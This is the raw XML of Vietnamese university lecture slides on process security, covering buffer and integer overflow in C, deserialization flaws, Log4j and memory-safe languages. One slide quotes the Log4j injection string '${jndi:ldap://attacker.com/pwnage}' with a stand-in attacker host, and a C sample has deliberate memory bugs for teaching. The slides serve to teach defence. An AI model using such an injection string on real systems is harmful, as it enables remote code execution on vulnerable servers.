                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   int *arr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   int len;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   printf(“Number of items: ”); scanf(“%d”, &amp;len);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   arr = (int *) malloc(len * sizeof(int));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   for(int i = 0; i &lt; len; i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  scanf(“%d”, arr[i]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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5AD029BA-ED11-4555-BB93-D956E5491979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563880" y="5190744"/>
            <a:ext cx="8229600" cy="146913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vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF000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014AB4A4-250A-4FCF-A40E-D49F245FFC0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2100322"/>
            <a:ext cx="4114800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void * malloc(unsigned int size)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394A610B-80DA-4BA8-B0DE-F9EE42C70E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449580" y="4767322"/>
            <a:ext cx="8122920" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Khi nào thì vùng nhớ có kích thước 4*n không đủ chỗ chứa cho n phần tử số nguyên?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Có xảy ra 4*n = 0 khi n≠0?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n = 0100 0000 0000 0000 = 0x4000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4*n = 0x0000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260575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A2CD-6827-6921-9261-562CBA24DCE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lỗ hổng serialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE94E498-825E-DE3C-C0CE-7C5451095018}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Serialization: cơ chế của ngôn ngữ lập trình cho phép chuyển một đối tượng bất kỳ thành một file hoặc luồng byte vào ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>File hoặc luồng byte có thể được chuyển cho một chương trình khác sử dụng. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Deserialization: Thực hiện chuyển ngược lại</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Phổ biến trong nhiều ngôn ngữ: Java, C#, Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Không kiểm soát file/luồng byte đầu vào khi deserialization là một lỗ hổng của chương trình</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công có thể đưa dữ liệu độc hại và chương trình thực thi mã độc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38540431-DFAA-89F4-EF71-269E2676FA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1895276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426A-2526-8728-0EDF-2419B350A4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lỗ hổng serialization: Log4j</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71E0A16-2DAD-6969-A633-03362DAC5774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log4j là Java framework phổ biến nhất để ghi thông tin nhật ký của ứng dụng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log4j sử dụng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JNDI (Java Naming &amp; Directory Interface) để lấy dữ liệu từ Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Log4j phân tích cú pháp của xâu đầu vào chứa nội dung nhật ký mà ứng dụng tạo ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lỗ hổng trong Log4j được công bố vào tháng 11/2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Một trong những lỗ hổng nguy hiểm nhất trong 10 năm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Giả sử Log4j nhận được xâu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>${jndi:ldap://attacker.com/pwnage}</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log4j thực hiện deserialze đối tượng lấy được từ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3E5FE0-E930-9B4F-9E72-2C6AA945818B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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20384018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600"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Lập trình an toàn</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000"/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D97DD6C-296B-E011-C49C-09D90A0AAB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376021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4A16-E079-BD5D-51C5-2DFD2E9C8CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ngôn  ngữ không an toàn và an toàn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2956188-C604-9308-7A25-A3B2C0226A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ngôn ngữ an toàn với bộ nhớ(memory-safe) được thiết kế để tự động kiểm tra biên truy cập và ngăn cản các truy cập không hợp lệ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ngăn chặn được toàn bộ lỗ hổng truy cập bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: Java, C#, Python, Go, Rust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tại sao ngôn ngữ không an toàn với bộ nhớ như C/C++ vẫn được sử dụng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Nguyên nhân thường được đề cập: hiệu năng của chương trình C/C++ tốt hơn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: thu hồi bộ nhớ với C/C++ gần như ngay lập tức, với các ngôn ngữ khác thì thời gian thu hồi không xác định(có thể 10 – 100ms)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Nguyên nhân thực tế: phần lớn các hệ thống ban đầu được viết bằng ngôn ngữ C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE81D21-C7FB-8E76-51A4-CD844EF06673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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28839900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8181-EDEA-F08A-04CB-200F575BDB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>“Giai thoại” về hiệu năng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492B322D-BE2C-B416-F674-8898F8525F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Trước kia, cần đánh đổi giữa an toàn và hiệu năng khi so sánh các ngôn ngữ lập trình</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hiện tại, phần lớn các ngôn ngữ an toàn cho bộ nhớ có hiệu năng tương đương so với C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: Go và Rust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ngoại lệ: hệ điều hành, games hiệu năng cao, phần mềm nhúng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Các ngôn ngữ an toàn cho bộ nhớ “chậm hơn” cũng được cắm thêm các thư viện viết bằng C để cải thiện hiệu năng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1B0C44-921D-4582-2422-85FC269DC0CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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36714731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FE9-0BC9-4268-A275-51BBCC66C18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lập trình an toàn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38607D1-6DD0-4D0B-B539-F4EA7D109327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Yêu cầu: Viết mã nguồn chương trình để đạt được các mục tiêu an toàn bảo mật</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bao gồm nhiều kỹ thuật khác nhau:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiểm soát giá trị đầu vào</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiểm soát truy cập bộ nhớ chính</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Che giấu mã nguồn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chống dịch ngược</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiểm soát kết quả đầu ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiểm soát quyền truy cập</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bài này chỉ đề cập đến một số quy tắc và nhấn mạnh vào vấn đề truy cập bộ nhớ một cách an toàn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EA0DFC9-81C2-4641-9FE1-C3408E29102A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1753991318"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="HUST_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BF86E9F-7C58-4A49-B74B-7F190E7436D3}" vid="{A4D50F83-385D-42CD-8477-E53A7E7432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C3CAAB23BA2B44AF89E56FA7008F5F" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="ff136ec48b612088013bb120d6af092d">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="8fda6bdf-ba54-43a9-955a-b0b24361e27e" xmlns:ns3="26c42173-7c7d-4d52-b6a8-37d7c4470ab9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c2305531687f3b6be72e67d7c9caa9ee" ns2:_="" ns3:_="">
    <xsd:import namespace="8fda6bdf-ba54-43a9-955a-b0b24361e27e"/>
    <xsd:import namespace="26c42173-7c7d-4d52-b6a8-37d7c4470a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da6bdf-ba54-43a9-955a-b0b24361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2173-7c7d-4d52-b6a8-37d7c4470a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fcd651a-ad8f-4914-ad89-b19b40585570}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="26c42173-7c7d-4d52-b6a8-37d7c4470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c42173-7c7d-4d52-b6a8-37d7c4470ab9" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="8fda6bdf-ba54-43a9-955a-b0b24361e27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FDAC2E8-F9BB-469A-9761-C3F345A00010}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4FFD4FBA-BCE5-48C4-898E-104ACDEEFC70}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{33D23025-EB3B-46F5-B411-877102FD73B7}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>HUST_theme</Template>
  <TotalTime>15303</TotalTime>
  <Words>13221</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>2878</Paragraphs>
  <Slides>111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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>HUST_theme</vt:lpstr>
      <vt:lpstr>Bài 7. An toàn cho tiến trình</vt:lpstr>
      <vt:lpstr>Nội dung</vt:lpstr>
      <vt:lpstr>2023 CWE Top 25</vt:lpstr>
      <vt:lpstr>1. Tổng quan về tiến trình (nhắc lại)</vt:lpstr>
      <vt:lpstr>Tiến trình(process) là gì?</vt:lpstr>
      <vt:lpstr>Cấp phát bộ nhớ cho tiến trình ntn?</vt:lpstr>
      <vt:lpstr>Bộ nhớ của tiến trình(Linux 32-bit)</vt:lpstr>
      <vt:lpstr>Bộ nhớ của tiến trình(x86 32-bit)</vt:lpstr>
      <vt:lpstr>Giới thiệu chung về kiến trúc x86</vt:lpstr>
      <vt:lpstr>Cú pháp trên x86</vt:lpstr>
      <vt:lpstr>Stack frame</vt:lpstr>
      <vt:lpstr>push</vt:lpstr>
      <vt:lpstr>pop</vt:lpstr>
      <vt:lpstr>Lời gọi hàm trong x86</vt:lpstr>
      <vt:lpstr>Quy ước gọi hàm trong x86</vt:lpstr>
      <vt:lpstr>Lời gọi hàm trong x86</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Ví dụ</vt:lpstr>
      <vt:lpstr>Thực hiện lời gọi hàm</vt:lpstr>
      <vt:lpstr>Thực hiện lời gọi hàm</vt:lpstr>
      <vt:lpstr>Trả về của hàm</vt:lpstr>
      <vt:lpstr>2. Lỗi tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Khái niệm</vt:lpstr>
      <vt:lpstr>C/C++ vẫn còn phổ biến(2024)</vt:lpstr>
      <vt:lpstr>Sự phổ biến của lỗ hổng Overflow</vt:lpstr>
      <vt:lpstr>Ví dụ về tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Ví dụ về tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Ví dụ về tràn bộ đệm</vt:lpstr>
